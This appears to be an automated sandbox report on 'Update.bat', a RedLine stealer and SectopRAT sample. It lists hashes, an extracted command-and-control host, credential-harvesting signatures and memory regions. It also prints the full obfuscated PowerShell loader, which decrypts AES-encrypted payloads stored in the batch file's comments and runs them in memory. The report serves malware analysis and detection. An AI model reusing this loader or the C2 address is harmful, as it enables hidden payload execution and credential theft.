Analysis
-
max time kernel
139s -
max time network
143s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
19-05-2024 15:59
Static task
static1
Behavioral task
behavioral1
Sample
Update.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Update.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
Update.bat
Resource
win11-20240419-en
General
-
Target
Update.bat
-
Size
90KB
-
MD5
3ad42ff8b873ba057e56908c4a9a2830
-
SHA1
aa377371f4aa319ac8367809229397e8cbe984f9
-
SHA256
59eeafa1a036a240d2e5ef549ddd90c5cb484f27dfa94a5f1af91a7e13f380b1
-
SHA512
e8c96bd11670e299f7ffff4bd1bdb5e56ea65051739fb6ade5269a307742a391af4ad1a9fe19828cb8a5422f317cfc1da31788a7e9478725dbb75b5b4ba867c1
-
SSDEEP
1536:ZSXLurkFJ+8TTbUGxintEI0l5a82Nx7GokVsIwX8ao8vpCoB9r6b38H1xlWlazf:ZSXLuInDintF0ba82NZbX9ManBCipZ
Malware Config
Extracted
redline
Hone_-_Installer
above-collect.gl.at.ply.gg:58881
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/208-33-0x0000000009640000-0x000000000965E000-memory.dmp family_redline -
SectopRAT payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/208-33-0x0000000009640000-0x000000000965E000-memory.dmp family_sectoprat -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 2 208 powershell.exe 5 208 powershell.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 208 powershell.exe 208 powershell.exe 208 powershell.exe 208 powershell.exe 208 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 208 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3296 wrote to memory of 208 3296 cmd.exe powershell.exe PID 3296 wrote to memory of 208 3296 cmd.exe powershell.exe PID 3296 wrote to memory of 208 3296 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Update.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DxAzrcaVfg2CFRZHSsUJyG7xHfjugn8NiLFpB5y2UPs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fwfLXU0xUC9GptqkwYqYDg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WBdwt=New-Object System.IO.MemoryStream(,$param_var); $LWQNs=New-Object System.IO.MemoryStream; $OazpV=New-Object System.IO.Compression.GZipStream($WBdwt, [IO.Compression.CompressionMode]::Decompress); $OazpV.CopyTo($LWQNs); $OazpV.Dispose(); $WBdwt.Dispose(); $LWQNs.Dispose(); $LWQNs.ToArray();}function execute_function($param_var,$param2_var){ $jOrir=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $lhPuX=$jOrir.EntryPoint; $lhPuX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Update.bat';$zaltw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Update.bat').Split([Environment]::NewLine);foreach ($uVtWj in $zaltw) { if ($uVtWj.StartsWith(':: ')) { $Uifnz=$uVtWj.Substring(3); break; }}$payloads_var=[string[]]$Uifnz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:208
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wkkq44sj.uvt.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
memory/208-31-0x00000000095F0000-0x00000000095F8000-memory.dmpFilesize
32KB
-
memory/208-10-0x0000000007F10000-0x0000000008260000-memory.dmpFilesize
3.3MB
-
memory/208-6-0x0000000073130000-0x000000007381E000-memory.dmpFilesize
6.9MB
-
memory/208-5-0x0000000007720000-0x0000000007D48000-memory.dmpFilesize
6.2MB
-
memory/208-32-0x0000000009630000-0x0000000009642000-memory.dmpFilesize
72KB
-
memory/208-8-0x0000000007D50000-0x0000000007DB6000-memory.dmpFilesize
408KB
-
memory/208-9-0x0000000007EA0000-0x0000000007F06000-memory.dmpFilesize
408KB
-
memory/208-33-0x0000000009640000-0x000000000965E000-memory.dmpFilesize
120KB
-
memory/208-11-0x0000000008320000-0x000000000833C000-memory.dmpFilesize
112KB
-
memory/208-37-0x0000000009710000-0x0000000009722000-memory.dmpFilesize
72KB
-
memory/208-13-0x00000000085E0000-0x0000000008656000-memory.dmpFilesize
472KB
-
memory/208-3-0x0000000004E50000-0x0000000004E86000-memory.dmpFilesize
216KB
-
memory/208-24-0x0000000073130000-0x000000007381E000-memory.dmpFilesize
6.9MB
-
memory/208-29-0x0000000009E50000-0x000000000A4C8000-memory.dmpFilesize
6.5MB
-
memory/208-30-0x00000000095B0000-0x00000000095CA000-memory.dmpFilesize
104KB
-
memory/208-0-0x000000007313E000-0x000000007313F000-memory.dmpFilesize
4KB
-
memory/208-7-0x0000000007580000-0x00000000075A2000-memory.dmpFilesize
136KB
-
memory/208-4-0x0000000073130000-0x000000007381E000-memory.dmpFilesize
6.9MB
-
memory/208-12-0x0000000008660000-0x00000000086AB000-memory.dmpFilesize
300KB
-
memory/208-36-0x000000000A4D0000-0x000000000AAD6000-memory.dmpFilesize
6.0MB
-
memory/208-38-0x0000000009770000-0x00000000097AE000-memory.dmpFilesize
248KB
-
memory/208-39-0x0000000009930000-0x0000000009A3A000-memory.dmpFilesize
1.0MB
-
memory/208-46-0x000000000AAE0000-0x000000000ACA2000-memory.dmpFilesize
1.8MB
-
memory/208-47-0x000000000B1E0000-0x000000000B70C000-memory.dmpFilesize
5.2MB
-
memory/208-48-0x000000000B710000-0x000000000BC0E000-memory.dmpFilesize
5.0MB
-
memory/208-49-0x0000000009D60000-0x0000000009DF2000-memory.dmpFilesize
584KB
-
memory/208-50-0x0000000009E20000-0x0000000009E3E000-memory.dmpFilesize
120KB
-
memory/208-106-0x0000000073130000-0x000000007381E000-memory.dmpFilesize
6.9MB
-
memory/208-107-0x0000000073130000-0x000000007381E000-memory.dmpFilesize
6.9MB
-
memory/208-112-0x000000007313E000-0x000000007313F000-memory.dmpFilesize
4KB
-
memory/208-114-0x0000000073130000-0x000000007381E000-memory.dmpFilesize
6.9MB
-
memory/208-115-0x0000000073130000-0x000000007381E000-memory.dmpFilesize
6.9MB
-
memory/208-116-0x0000000073130000-0x000000007381E000-memory.dmpFilesize
6.9MB
-
memory/208-120-0x0000000073130000-0x000000007381E000-memory.dmpFilesize
6.9MB